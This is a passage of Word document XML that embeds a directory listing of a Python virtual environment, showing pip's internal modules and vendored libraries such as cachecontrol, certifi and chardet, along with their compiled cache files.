          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75708C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./venv/lib/python3.9/site-packages/pip/_internal/metadata/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BA1EA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base.cpython-39.pyc  pkg_resources.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436A23D" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFAF99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./venv/lib/python3.9/site-packages/pip/_internal/models:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D450F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candidate.py   format_control.py  link.py    search_scope.py     target_python.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C53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direct_url.py  index.py           scheme.py  selection_prefs.py  wheel.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A91834" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331246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./venv/lib/python3.9/site-packages/pip/_internal/models/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F182AA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__init__.cpython-39.pyc    format_control.cpython-39.pyc  scheme.cpython-39.pyc           target_python.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D297F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candidate.cpython-39.pyc   index.cpython-39.pyc           search_scope.cpython-39.pyc     wheel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1586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direct_url.cpython-39.pyc  link.cpython-39.pyc            selection_prefs.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C32EED" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AEC34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./venv/lib/python3.9/site-packages/pip/_internal/network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A537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auth.py  cache.py  download.py  lazy_wheel.py  session.py  utils.py  xmlrpc.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6757E8DB" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328D174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./venv/lib/python3.9/site-packages/pip/_internal/network/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C343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cache.cpython-39.pyc     lazy_wheel.cpython-39.pyc  utils.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030C17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auth.cpython-39.pyc      download.cpython-39.pyc  session.cpython-39.pyc     xmlrpc.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F1BDB9" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320808B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./venv/lib/python3.9/site-packages/pip/_internal/operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7943799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build  check.py  freeze.py  install  prepare.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D817C" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317D38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./venv/lib/python3.9/site-packages/pip/_internal/operations/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAF5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check.cpython-39.pyc  freeze.cpython-39.pyc  prepare.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BBA8E0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B4A7B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./venv/lib/python3.9/site-packages/pip/_internal/operations/build:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1371E8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metadata.py  metadata_editable.py  metadata_legacy.py  wheel.py  wheel_editable.py  wheel_legacy.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E987ED" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01103A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./venv/lib/python3.9/site-packages/pip/_internal/operations/build/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6694E1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metadata_editable.cpython-39.pyc  wheel.cpython-39.pyc           wheel_legacy.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E058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metadata.cpython-39.pyc  metadata_legacy.cpython-39.pyc    wheel_editable.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61475539" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089D60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./venv/lib/python3.9/site-packages/pip/_internal/operations/install:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18926E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editable_legacy.py  legacy.py  wheel.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE4037" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE260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./venv/lib/python3.9/site-packages/pip/_internal/operations/install/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A5F5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editable_legacy.cpython-39.pyc  legacy.cpython-39.pyc  wheel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CAC3D3" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C72AB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./venv/lib/python3.9/site-packages/pip/_internal/req:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE05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constructors.py  req_file.py  req_install.py  req_set.py  req_tracker.py  req_uninstall.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F6E47D" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A8658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./venv/lib/python3.9/site-packages/pip/_internal/req/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444AD46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req_file.cpython-39.pyc     req_set.cpython-39.pyc      req_uninstall.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2C1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constructors.cpython-39.pyc  req_install.cpython-39.pyc  req_tracker.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B899FB7" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C0EB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./venv/lib/python3.9/site-packages/pip/_internal/resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491753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base.py  legacy  resolvelib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFBC7C6" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2BC9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./venv/lib/python3.9/site-packages/pip/_internal/resolution/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE13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base.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A9C928" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C96D3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./venv/lib/python3.9/site-packages/pip/_internal/resolution/legacy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514767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resolver.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B638D76" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7536AC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./venv/lib/python3.9/site-packages/pip/_internal/resolution/legacy/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8493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resolver.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72093600" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6669A29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./venv/lib/python3.9/site-packages/pip/_internal/resolution/resolvelib:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D909B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base.py        factory.py           provider.py  requirements.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A4E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candidates.py  found_candidates.py  reporter.py  resolver.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD54282" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096566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./venv/lib/python3.9/site-packages/pip/_internal/resolution/resolvelib/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120989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factory.cpython-39.pyc           reporter.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DF2A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base.cpython-39.pyc        found_candidates.cpython-39.pyc  requirements.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16743D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candidates.cpython-39.pyc  provider.cpython-39.pyc          resolver.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045BF8DD" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5766E00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./venv/lib/python3.9/site-packages/pip/_internal/utils:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD00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compatibility_tags.py  egg_link.py     glibc.py                   models.py            subprocess.py  wheel.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F248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datetime.py            encoding.py     hashes.py                  packaging.py         temp_dir.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C86A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_log.py      deprecation.py         entrypoints.py  inject_securetransport.py  parallel.py          unpacking.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67993D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appdirs.py   direct_url_helpers.py  filesystem.py   logging.py                 pkg_resources.py     urls.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE998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compat.py    distutils_args.py      filetypes.py    misc.py                    setuptools_build.py  virtualenv.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893B836" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460EB7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./venv/lib/python3.9/site-packages/pip/_internal/utils/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA17E3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encoding.cpython-39.pyc                packaging.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773D4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_log.cpython-39.pyc                entrypoints.cpython-39.pyc             parallel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BE623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appdirs.cpython-39.pyc             filesystem.cpython-39.pyc              pkg_resources.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCAF1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compat.cpython-39.pyc              filetypes.cpython-39.pyc               setuptools_build.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A5A8C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compatibility_tags.cpython-39.pyc  glibc.cpython-39.pyc                   subprocess.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09489F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datetime.cpython-39.pyc            hashes.cpython-39.pyc                  temp_dir.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4225713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deprecation.cpython-39.pyc         inject_securetransport.cpython-39.pyc  unpacking.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317493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direct_url_helpers.cpython-39.pyc  logging.cpython-39.pyc                 urls.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6044191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distutils_args.cpython-39.pyc      misc.cpython-39.pyc                    virtualenv.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F84381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egg_link.cpython-39.pyc            models.cpython-39.pyc                  wheel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6899ED" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE615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./venv/lib/python3.9/site-packages/pip/_internal/vcs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED5B7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bazaar.py  git.py  mercurial.py  subversion.py  versioncontrol.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E174AA" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F45A1D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./venv/lib/python3.9/site-packages/pip/_internal/vcs/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F316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git.cpython-39.pyc        subversion.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F6933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bazaar.cpython-39.pyc    mercurial.cpython-39.pyc  versioncontrol.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A35D7" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50704D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6A48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__init__.py   certifi   distlib    idna       pep517         progress      resolvelib  tomli       webencodings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B62A03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chardet   distro.py  msgpack    pkg_resources  pyparsing.py  six.py      urllib3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8EC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cachecontrol  colorama  html5lib   packaging  platformdirs   requests      tenacity    vendor.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4894C649" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E87C8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./venv/lib/python3.9/site-packages/pip/_vendor/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A14236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distro.cpython-39.pyc  pyparsing.cpython-39.pyc  six.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419EE25C" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075EC94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./venv/lib/python3.9/site-packages/pip/_vendor/cachecontrol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B705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_cmd.py     cache.py  compat.py      filewrapper.py  serialize.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0CBF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adapter.py  caches    controller.py  heuristics.py   wrapper.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CE665A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7939626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./venv/lib/python3.9/site-packages/pip/_vendor/cachecontrol/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29823C9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cache.cpython-39.pyc       filewrapper.cpython-39.pyc  wrapper.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A48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_cmd.cpython-39.pyc      compat.cpython-39.pyc      heuristics.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A362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adapter.cpython-39.pyc   controller.cpython-39.pyc  serialize.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15103F49" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B589DB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./venv/lib/python3.9/site-packages/pip/_vendor/cachecontrol/caches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A6AF2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file_cache.py  redis_cache.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729922F5" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DF04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./venv/lib/python3.9/site-packages/pip/_vendor/cachecontrol/caches/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA12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file_cache.cpython-39.pyc  redis_cache.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348CEFC3" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD6D2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./venv/lib/python3.9/site-packages/pip/_vendor/certifi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556496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__main__.py  __pycache__  core.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE885F0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0967051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./venv/lib/python3.9/site-packages/pip/_vendor/certifi/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503BAA2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__main__.cpython-39.pyc  core.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFAC594" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7A6F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./venv/lib/python3.9/site-packages/pip/_vendor/chardet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A132A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__init__.py            compat.py       euctwprober.py         langhungarianmodel.py  sbcharsetprober.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C64B7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cp949prober.py  gb2312freq.py          langrussianmodel.py    sbcsgroupprober.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE72F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big5freq.py            enums.py        gb2312prober.py        langthaimodel.py       sjisprober.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5609CE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big5prober.py          escprober.py    hebrewprober.py        langturkishmodel.py    universaldetector.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5145E51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chardistribution.py    escsm.py        jisfreq.py             latin1prober.py        utf8prober.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0171A1F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charsetgroupprober.py  eucjpprober.py  jpcntx.py              mbcharsetprober.py     version.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5EF33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charsetprober.py       euckrfreq.py    langbulgarianmodel.py  mbcsgroupprober.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A677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cli                    euckrprober.py  langgreekmodel.py      mbcssm.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253217E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codingstatemachine.py  euctwfreq.py    langhebrewmodel.py     metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB94DF" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561AD8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./venv/lib/python3.9/site-packages/pip/_vendor/chardet/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F02978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euckrfreq.cpython-39.pyc           langrussianmodel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B21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big5freq.cpython-39.pyc            euckrprober.cpython-39.pyc         langthaimodel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD0864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big5prober.cpython-39.pyc          euctwfreq.cpython-39.pyc           langturkishmodel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BCA9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chardistribution.cpython-39.pyc    euctwprober.cpython-39.pyc         latin1prober.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE492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charsetgroupprober.cpython-39.pyc  gb2312freq.cpython-39.pyc          mbcharsetprober.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D90E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charsetprober.cpython-39.pyc       gb2312prober.cpython-39.pyc        mbcsgroupprober.cpython-39.pyc</w:t>
      </w:r>
